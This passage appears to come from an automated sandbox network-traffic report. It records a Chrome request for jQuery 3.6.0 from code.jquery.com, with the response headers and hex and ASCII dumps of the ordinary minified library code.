                          2024-11-25 16:55:44 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                          2024-11-25 16:55:44 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                          2024-11-25 16:55:44 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                          2024-11-25 16:55:44 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                          2024-11-25 16:55:44 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                          2024-11-25 16:55:44 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                          2024-11-25 16:55:44 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                          2024-11-25 16:55:44 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                          2024-11-25 16:55:44 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.449749151.101.66.1374434416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-11-25 16:55:46 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                          Host: code.jquery.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-11-25 16:55:46 UTC613INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 89501
                          Server: nginx
                          Content-Type: application/javascript; charset=utf-8
                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                          ETag: "28feccc0-15d9d"
                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          Via: 1.1 varnish, 1.1 varnish
                          Accept-Ranges: bytes
                          Age: 2535821
                          Date: Mon, 25 Nov 2024 16:55:46 GMT
                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740048-EWR
                          X-Cache: HIT, HIT
                          X-Cache-Hits: 5889, 0
                          X-Timer: S1732553747.757254,VS0,VE1
                          Vary: Accept-Encoding
                          2024-11-25 16:55:46 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                          2024-11-25 16:55:46 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                          2024-11-25 16:55:46 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                          2024-11-25 16:55:46 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                          2024-11-25 16:55:46 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                          2024-11-25 16:55:46 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                          2024-11-25 16:55:46 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                          2024-11-25 16:55:46 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                          2024-11-25 16:55:46 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
